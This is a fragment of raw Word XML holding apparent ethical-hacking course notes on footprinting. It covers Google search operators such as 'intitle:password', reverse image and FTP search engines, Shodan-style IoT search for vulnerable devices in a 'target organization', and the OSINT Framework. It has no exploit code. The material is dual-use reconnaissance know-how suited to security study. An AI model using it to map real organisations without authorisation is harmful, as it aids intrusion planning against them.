              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="59F92271" w14:textId="77777777" w:rsidR="009102F1" w:rsidRDefault="009102F1" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7941" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="45AB29B5" w14:textId="77777777" w:rsidR="009102F1" w:rsidRDefault="009102F1" w:rsidP="0043739D"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2127FC1B" w14:textId="77777777" w:rsidR="00BA047C" w:rsidRDefault="00BA047C"/>
    <w:p w14:paraId="02814CF3" w14:textId="77777777" w:rsidR="00BA047C" w:rsidRDefault="00BA047C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F705216" w14:textId="2C68F536" w:rsidR="00BA047C" w:rsidRDefault="00BA047C" w:rsidP="00BA047C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Footprinting: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internet search engines</w:t>
      </w:r>
      <w:r w:rsidR="00490FD5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | OSINT Framework</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1098"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="615"/>
        <w:gridCol w:w="2390"/>
        <w:gridCol w:w="8022"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA047C" w14:paraId="4A19B44A" w14:textId="77777777" w:rsidTr="00A074EF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7C0BA86A" w14:textId="6544D5C9" w:rsidR="00BA047C" w:rsidRDefault="00BA047C" w:rsidP="00A074EF">
            <w:r>
              <w:t>12.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6648D714" w14:textId="5DF1417B" w:rsidR="00BA047C" w:rsidRDefault="002921D2" w:rsidP="00A074EF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Google Search Operators</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidR="006A324E">
              <w:br/>
            </w:r>
            <w:r w:rsidR="006A324E">
              <w:br/>
            </w:r>
            <w:r w:rsidR="006A324E" w:rsidRPr="006A324E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Anchor text is the link label, or link text, that appears blue and underlined signalling a hyperlink)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="288DFB3C" w14:textId="06E3EABF" w:rsidR="00BA047C" w:rsidRDefault="00BA047C" w:rsidP="00A074EF">
            <w:r>
              <w:t xml:space="preserve">There are many different </w:t>
            </w:r>
            <w:r w:rsidR="00630B95">
              <w:t>operators</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> that can be used to help footprinting activities</w:t>
            </w:r>
            <w:r w:rsidR="00630B95">
              <w:t xml:space="preserve"> within web search engines. For example:</w:t>
            </w:r>
            <w:r w:rsidR="00630B95">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00630B95" w:rsidRPr="00630B95">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>intitle:</w:t>
            </w:r>
            <w:r w:rsidR="00630B95" w:rsidRPr="00630B95">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
            <w:r w:rsidR="00630B95">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00630B95">
              <w:tab/>
              <w:t>Contain specified word in the title</w:t>
            </w:r>
            <w:r w:rsidR="00630B95">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00630B95" w:rsidRPr="00630B95">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>site:</w:t>
            </w:r>
            <w:r w:rsidR="00630B95" w:rsidRPr="00630B95">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>www.microsoft.com</w:t>
            </w:r>
            <w:r w:rsidR="00630B95">
              <w:tab/>
              <w:t>Restrict results to pages on a certain website</w:t>
            </w:r>
            <w:r w:rsidR="00630B95">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00630B95" w:rsidRPr="00630B95">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>filetype:</w:t>
            </w:r>
            <w:r w:rsidR="00630B95" w:rsidRPr="00630B95">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>pdf</w:t>
            </w:r>
            <w:r w:rsidR="00630B95">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00630B95">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00630B95">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AB7E00" w:rsidRPr="00AB7E00">
              <w:t>Search only for a certain file type</w:t>
            </w:r>
            <w:r w:rsidR="00AB7E00">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00AB7E00" w:rsidRPr="00AB7E00">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>cache:</w:t>
            </w:r>
            <w:r w:rsidR="00AB7E00" w:rsidRPr="00AB7E00">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>www.microsoft.com</w:t>
            </w:r>
            <w:r w:rsidR="00AB7E00">
              <w:tab/>
              <w:t>View cached versions of the web page</w:t>
            </w:r>
            <w:r w:rsidR="00AB7E00">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00AB7E00" w:rsidRPr="00AB7E00">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>allinurl:</w:t>
            </w:r>
            <w:r w:rsidR="00AB7E00" w:rsidRPr="00AB7E00">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>google career</w:t>
            </w:r>
            <w:r w:rsidR="00AB7E00" w:rsidRPr="00AB7E00">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AB7E00">
              <w:tab/>
              <w:t>Restricts results to words specified in URL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FEA9293" w14:textId="70B1565C" w:rsidR="00AB7E00" w:rsidRDefault="00AB7E00" w:rsidP="00A074EF">
            <w:r w:rsidRPr="006A324E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>allintitle:</w:t>
            </w:r>
            <w:r w:rsidR="006A324E" w:rsidRPr="006A324E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>detect malware</w:t>
            </w:r>
            <w:r w:rsidR="006A324E">
              <w:tab/>
              <w:t>Restricts results to words specified in title</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25BE3BA2" w14:textId="5E4AF15E" w:rsidR="006A324E" w:rsidRDefault="006A324E" w:rsidP="00A074EF">
            <w:r w:rsidRPr="006A324E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">Anti-virus </w:t>
            </w:r>
            <w:r w:rsidRPr="006A324E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>inanchor:</w:t>
            </w:r>
            <w:r w:rsidRPr="006A324E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>Norton</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Restricts pages to anchor text specified</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="639B5C3E" w14:textId="77777777" w:rsidR="006A324E" w:rsidRDefault="00EA6DF7" w:rsidP="00A074EF">
            <w:r w:rsidRPr="00EA6DF7">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>allinanchor:</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA6DF7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>best cloud service</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>Restricts pages to anchor text specified</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00EA6DF7">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>link:</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA6DF7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>www.googleguide.com</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Finds pages that point to specified page’s home page</w:t>
            </w:r>
            <w:r w:rsidR="00A074EF">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00A074EF" w:rsidRPr="00A074EF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>related:</w:t>
            </w:r>
            <w:r w:rsidR="00A074EF" w:rsidRPr="00A074EF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>www.google.com</w:t>
            </w:r>
            <w:r w:rsidR="00A074EF">
              <w:tab/>
              <w:t>Displays websites similar or related to specified URL</w:t>
            </w:r>
            <w:r w:rsidR="00A074EF">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00A074EF" w:rsidRPr="00A074EF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>info:</w:t>
            </w:r>
            <w:r w:rsidR="00A074EF" w:rsidRPr="00A074EF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>gohotel.com</w:t>
            </w:r>
            <w:r w:rsidR="00A074EF">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00A074EF">
              <w:tab/>
              <w:t>Query provides information about specified URL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="136FFBC0" w14:textId="138A30D8" w:rsidR="00A074EF" w:rsidRDefault="00A074EF" w:rsidP="00A074EF">
            <w:r w:rsidRPr="00A074EF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>location:</w:t>
            </w:r>
            <w:r w:rsidRPr="00A074EF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>restaurant</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Finds information for a specific location</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA047C" w14:paraId="68663E81" w14:textId="77777777" w:rsidTr="00A074EF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="572655EB" w14:textId="1E94DFAC" w:rsidR="00BA047C" w:rsidRDefault="00BA047C" w:rsidP="00A074EF">
            <w:r>
              <w:t>12.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="74BB0CCF" w14:textId="1C3754CE" w:rsidR="006A2731" w:rsidRDefault="002921D2" w:rsidP="002921D2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Reverse Image Search</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4F389AD7" w14:textId="5D4739AA" w:rsidR="00BA047C" w:rsidRDefault="006A2731" w:rsidP="00A074EF">
            <w:r>
              <w:t xml:space="preserve">Search for a video in </w:t>
            </w:r>
            <w:r w:rsidRPr="006A2731">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>YouTube</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, right click the video title and copy link location (the page url) then, proceed to </w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:rPr>
                <w:rStyle w:val="typetext"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>https://citizenevidence.amnestyusa.org/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="typetext"/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:t>This will show you the video ID, upload date and time and thumbnail images for a reverse image search.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidR="002921D2">
              <w:br/>
              <w:t>Here are a list of possible useful video search engine sites:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="315D6E89" w14:textId="0944D8E1" w:rsidR="002921D2" w:rsidRDefault="002921D2" w:rsidP="002921D2">
            <w:r w:rsidRPr="002921D2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>YouTube, Google Videos, Yahoo Videos, EZGif, VideoReverser, TinEye, Reverse Image Search, Yahoo Image Search, citizenevidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA047C" w14:paraId="16AAF2A4" w14:textId="77777777" w:rsidTr="00A074EF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3578D8AB" w14:textId="7A687DE2" w:rsidR="00BA047C" w:rsidRDefault="00BA047C" w:rsidP="00A074EF">
            <w:r>
              <w:t>12.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="781CF0FC" w14:textId="05B2A66A" w:rsidR="00BA047C" w:rsidRDefault="002921D2" w:rsidP="00A074EF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>FTP Search Engines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3E27C485" w14:textId="1E9F6553" w:rsidR="00BA047C" w:rsidRDefault="00EE76AB" w:rsidP="00A074EF">
            <w:r>
              <w:t>Use the NAPALM FTP indexer FTP search engine to extract critical FTP information about the target organization, visit www.searchftps.net/</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">Or, </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE76AB">
              <w:t xml:space="preserve">alternatively there may be ftp search engines </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">at </w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>https://globalfilesearch.com</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE76AB">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">or </w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>http://www.freewareweb.com.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE76AB" w14:paraId="5991FB52" w14:textId="77777777" w:rsidTr="00A074EF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4A7BC3E8" w14:textId="304CE81F" w:rsidR="00EE76AB" w:rsidRDefault="00EE76AB" w:rsidP="00A074EF">
            <w:r>
              <w:t>12.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0917750D" w14:textId="28B66352" w:rsidR="00EE76AB" w:rsidRDefault="00EE76AB" w:rsidP="00A074EF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>IoT Search Engines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="63F21810" w14:textId="2885A51B" w:rsidR="001B53FF" w:rsidRDefault="001B53FF" w:rsidP="00A074EF">
            <w:r>
              <w:t xml:space="preserve">Shodan can be used to search for any vulnerable IoT devices in the target organisation, visit </w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>https://www.shodan.io.</w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Also useful are </w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>https://censys.io</w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">and </w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>https://www.thingful.net</w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>which are IoT search engines, to gather information such as manufacturer details, geographical location, IP address, hostname, open ports, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00490FD5" w14:paraId="59C1C333" w14:textId="77777777" w:rsidTr="00A074EF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="21265CA5" w14:textId="66BC1B99" w:rsidR="00490FD5" w:rsidRDefault="00490FD5" w:rsidP="00A074EF">
            <w:r>
              <w:t>12.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="57BCDD50" w14:textId="7131BABE" w:rsidR="00490FD5" w:rsidRDefault="00490FD5" w:rsidP="00A074EF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>OSINT Framework</w:t>
            </w:r>
            <w:r w:rsidR="00E71928">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00E71928" w:rsidRPr="00E71928">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> (osintframework.com)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0768C7A3" w14:textId="1EB03683" w:rsidR="00490FD5" w:rsidRDefault="00E71928" w:rsidP="00490FD5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1092"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Simply visit: </w:t>
            </w:r>
            <w:r w:rsidRPr="00E71928">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>https://osintframework.com</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00895A29">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00490FD5" w:rsidRPr="00490FD5">
              <w:t xml:space="preserve">OSINT Framework is an </w:t>
            </w:r>
            <w:r w:rsidR="00C76802" w:rsidRPr="00490FD5">
              <w:t>open-source</w:t>
            </w:r>
            <w:r w:rsidR="00490FD5" w:rsidRPr="00490FD5">
              <w:t xml:space="preserve"> intelligence gathering framework that helps security professionals for performing automated footprinting and reconnaissance, OSINT research, and intelligence gathering. It is focused on gathering information from free tools or resources.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="038328D2" w14:textId="18FEF0CE" w:rsidR="00490FD5" w:rsidRDefault="00490FD5" w:rsidP="00490FD5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1092"/>
              </w:tabs>
            </w:pPr>
            <w:r w:rsidRPr="00490FD5">
              <w:t>This framework includes a simple web interface that lists various OSINT tools arranged by category and is shown as an OSINT tree structure on the web interface.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00490FD5" w14:paraId="12D7C383" w14:textId="77777777" w:rsidTr="00A074EF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="1BA4DD36" w14:textId="08FC0650" w:rsidR="00490FD5" w:rsidRDefault="00490FD5" w:rsidP="00A074EF">
            <w:r>
              <w:t>12.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1EC7276D" w14:textId="77777777" w:rsidR="00490FD5" w:rsidRDefault="00490FD5" w:rsidP="00A074EF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="59404D06" w14:textId="175B95D8" w:rsidR="00490FD5" w:rsidRPr="00490FD5" w:rsidRDefault="00895A29" w:rsidP="00895A29">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1092"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>The OSINT Framework includes the following indicators with the available tools:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>(T) - Indicates a link to a tool that must be installed and run locally</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>(D) - Google Dork</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>(R) - Requires registration</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">(M) - Indicates a URL that contains the search term and the URL itself must </w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>be edited manually</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA047C" w14:paraId="74D9ED73" w14:textId="77777777" w:rsidTr="00A074EF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="5A065ED5" w14:textId="77777777" w:rsidR="00BA047C" w:rsidRDefault="00BA047C" w:rsidP="00A074EF"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
